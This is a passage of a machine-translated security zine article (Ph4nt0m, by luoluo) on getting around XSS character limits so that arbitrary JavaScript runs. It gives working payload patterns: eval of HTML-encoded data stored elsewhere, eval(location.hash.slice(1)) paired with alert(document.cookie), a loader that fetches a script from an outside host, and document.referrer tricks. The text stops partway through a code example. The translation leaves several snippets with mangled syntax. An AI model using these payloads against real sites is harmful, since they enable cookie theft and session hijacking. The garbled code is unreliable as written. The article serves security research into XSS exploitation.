Attackers can execute arbitrary JS Code by breaking the XSS Character Count limit.

= Ph4nt0m Security Team =

Issue 0x03, Phile #0x04 of 0x07


| = --------------------------------------------------------------------------- = |
| = ------------------- = [Break through the XSS character limit and execute any JS Code] = --------------- = |
| = --------------------------------------------------------------------------- = |
| = --------------------------------------------------------------------------- = |
| = ------------------------ = [By luoluo] = --------------------------- = |
| = ---------------------- = [<Luoluo # ph4nt0m.org>] = ------------------------ = |
| = ---------------------- = [<Luoluo # 80sec.com>] = ------------------------ = |
| = --------------------------------------------------------------------------- = |


[Directory]

1. Summary
2. Breakthrough Methods
2.1 use other controllable data in HTML Context
2.2 use the data in the URL
2.3 JS context utilization
2.4 use browser features to transmit data between cross-origin pages
2.4.1 document. referrer
2.4.2 clipboard clipboardData
2.4.3 window name window. name
More than 2.5 of the combined use methods
3. Postscript
4. Reference


I. Summary

Some XSS vulnerabilities cannot be effectively exploited due to limited characters. Only one dialog box can be displayed for YY.
We will discuss how to break through the limit on the number of characters for effective use. Here, the definition of effective use is unrestricted.
Line any JS. For cross-site teachers, it is a pleasure to study the possibility of XSS exploitation in extreme cases; for product security
For developers, unrestricted exploitation may be the most powerful evidence provided to developers, asking them to pay attention to and fix these problems.
In extreme cases.

There are many methods for breakthrough, but the idea of breakthrough is basically the same, that is, the number of unrestricted executions
Data.


Ii. Breakthrough Methods

2.1 use other controllable data in HTML Context

If the HTML context of a page with the XSS vulnerability has other controllable data, you can obtain the data through JS.
The data is executed using eval, document. write, innerHTML, and other methods to exceed the XSS Character Count limit.
The following example assumes that the internal data of the div element can be controlled, but the data has been HTML encoded:

-- Code -------------------------------------------------------------------------
<Div id = "x"> controllable and secure data </div>
<Limited_xss_point> alert (/xss/); </limited_xss_point>
-------------------------------------------------------------------------------

Because XSS points have a limit on the number of characters, we can only play the box here, so we can use the XSS Payload through escape
After encoding, it is used as safe data and output to a controllable security data location. Then, it executes controllable security data at the XSS point:

-- Code -------------------------------------------------------------------------
<Div id = "x"> alert % 28document. cookie % 29% 3B </div>
<Limited_xss_point> eval (unescape (x. innerHTML); </limited_xss_point>
-------------------------------------------------------------------------------

Length: 28 + len (id)

Since there is no limit on the number of characters in x's internal data, it can be used to execute any JavaScript code.


2.2 use the data in the URL

What if the controllable HTML context data mentioned in the previous section does not exist on the page? Some data is unconditional.
Control, the first thing that comes to mind is the URL. By constructing the code to be executed by parameters at the end of the URL
Document. URL/location. href and other methods to obtain code data for execution. Here we assume that the Code starts from 80th characters
Finally:

-- Code -------------------------------------------------------------------------
Http://www.xssedsite.com/xssed.php? X = 1... & alert (document. cookie)

<Limited_xss_point> eval (document. URL. substr (80); </limited_xss_point>
-------------------------------------------------------------------------------

Length: 30

-- Code -------------------------------------------------------------------------
<Limited_xss_point> eval (location. href. substr (80); </limited_xss_point>
-------------------------------------------------------------------------------

Length: 31

Compared with the above two examples, the previous example is shorter. Is there a way to be shorter? Access the JavaScript Manual
The String method can be found that the cut String has a shorter function slice, and the five characters are shorter than the substr
Character:

-- Code -------------------------------------------------------------------------
<Limited_xss_point> eval (document. URL. slice (80); </limited_xss_point>
-------------------------------------------------------------------------------

Length: 29

-- Code -------------------------------------------------------------------------
<Limited_xss_point> eval (location. href. slice (80); </limited_xss_point>
-------------------------------------------------------------------------------

Length: 30

So there is no way to be shorter? The answer is YES. Check the location object reference in MSND and you will find
There is a hash member to get the data after #, so we can put the code to be executed after #, and then get it through hash
Code execution is required. Because the obtained data starts with #, you only need to get the code by one slice character:

-- Code -------------------------------------------------------------------------
Http://www.xssedsite.com/xssed.php? X = 1... # alert (document. cookie)

<Limited_xss_point> eval (location. hash. slice (1); </limited_xss_point>
-------------------------------------------------------------------------------

Length: 29

This is one character less than the above example. Can it be shorter?


2.3 JS context utilization

Why am I so miserable? That's because the method name and attribute name of JS and DHTML are too long! Look at these "bad" names:

String. fromCharCode
GetElementById
GetElementsByTagName
Document. write
XMLHTTPRequest
...

Even developers do not want to write more once, so many site front-end development engineers encapsulate a variety
Simplified functions:

-- Code -------------------------------------------------------------------------
Function $ (id ){
Return document. getElementById (id );
}
-------------------------------------------------------------------------------

These functions can also be used to shorten the length of our Payload. However, the above example is not
For the shortest, both IE and FF support referencing an element directly by ID. Some functions can be directly used to load our code:

-- Code -------------------------------------------------------------------------
Function loads (url ){
...
Document. body. appendChild (script );
}

<Limited_xss_point> loads (http://xxx.com/x); </limited_xss_point>
-------------------------------------------------------------------------------

Length: len (function name) + len (url) + 5

Of course, the shorter Your url, the better! Some functions will help us make HTTP requests:

-- Code -------------------------------------------------------------------------
Function get (url ){
...
Return x. responseText;
}

<Limited_xss_point> eval (get (http://xxx.com/x); </limited_xss_point>
-------------------------------------------------------------------------------

Length: len (function name) + len (url) + 11

Brother Tao proposed that some popular JS development frameworks also encapsulate a large number of powerful libraries for calling, such:

JQuery
YUI
...

To sum up, we can analyze the existing frameworks, objects, classes, and functions in the JS context to shorten
To execute arbitrary code beyond the length limit.


2.4 use browser features to transmit data between cross-origin pages

Although there are restrictions on the same-origin policy, the function design of the browser still retains a very small number of Cross-Origin data transfer
Methods, we can use these methods to transfer data across pages to the page of the XSS domain for execution.

2.4.1 document. referrer

Attackers can construct a page on their own domain to jump to the page on the XSS page.
Payload, which is executed by the XSS page through referrer to obtain the relevant code.

Page constructed by the attacker:

-- Code -------------------------------------------------------------------------
Http://www.a.com/attack.html ?... & Alert (Alibaba E